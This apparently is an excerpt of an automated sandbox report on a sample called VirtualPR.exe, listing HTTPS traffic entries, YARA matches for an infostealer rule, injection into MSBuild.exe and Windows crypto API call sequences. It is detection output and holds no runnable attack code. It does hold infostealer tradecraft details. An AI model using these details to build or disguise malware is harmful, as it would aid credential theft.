                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.4557432637.000000000388B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2728, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA10D4 CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,22_2_03AA10D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA14B8 CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptEncrypt,CryptEncrypt,CryptEncrypt,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,22_2_03AA14B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0910 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptEncrypt,CryptEncrypt,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptImportKey,CryptSignHashA,CryptSignHashA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,22_2_03AA0910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA0CC4 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDecrypt,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,22_2_03AA0CC4

                  System Summary

                  barindex
                  Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.VirtualPR.exe.4e01008.5.raw.unpack, ManagesModules.csLarge array initialization: DataBytes: array initializer size 98304
                  Source: 0.2.VirtualPR.exe.5660000.7.raw.unpack, ManagesModules.csLarge array initialization: DataBytes: array initializer size 98304
                  Source: wbuje1zp.dll.2.dr, ManagesModules.csLarge array initialization: DataBytes: array initializer size 98304
                  Source: doceyppt.dll.15.dr, ManagesModules.csLarge array initialization: DataBytes: array initializer size 98304
                  Source: VirtualPR.exe, espyHmxjzsfquxSE.csLong String: Length: 1238903
                  Source: 0.2.VirtualPR.exe.5660250.6.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 0.2.VirtualPR.exe.4e19e28.3.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 0.2.VirtualPR.exe.5680000.8.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 0.2.VirtualPR.exe.4e01258.4.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 2.3.csc.exe.5b70200.2.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 2.3.csc.exe.5b70200.0.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 2.3.csc.exe.5b70200.1.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 15.3.csc.exe.55df4e0.2.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 15.3.csc.exe.55df4e0.0.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: 15.3.csc.exe.55df4e0.1.raw.unpack, n5Dh00mp5s.csLong String: Length: 45923
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA75CC LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,22_2_03AA75CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_02E707C512_2_02E707C5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03793B0A12_2_03793B0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03793B0C12_2_03793B0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0379415412_2_03794154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036BF76812_2_036BF768
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0370067012_2_03700670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036BD69812_2_036BD698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036DC50012_2_036DC500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036BF5FC12_2_036BF5FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0370B4E012_2_0370B4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036F9B7812_2_036F9B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036C8B2012_2_036C8B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036F8A2812_2_036F8A28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036F49A412_2_036F49A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036D881C12_2_036D881C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036EAFF412_2_036EAFF4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036CBEC412_2_036CBEC4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036BEEAC12_2_036BEEAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036DAD3412_2_036DAD34
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036E8DCC12_2_036E8DCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036B9C6412_2_036B9C64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_036BFC1C12_2_036BFC1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B03CC12_2_038B03CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0388B31C12_2_0388B31C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B12F812_2_038B12F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0389109812_2_03891098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B379812_2_038B3798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B173412_2_038B1734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B261812_2_038B2618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038AEBDF12_2_038AEBDF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038A7AF812_2_038A7AF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B2A3412_2_038B2A34
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038B394B12_2_038B394B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0389094012_2_03890940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038E182812_2_038E1828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_03893FEB12_2_03893FEB
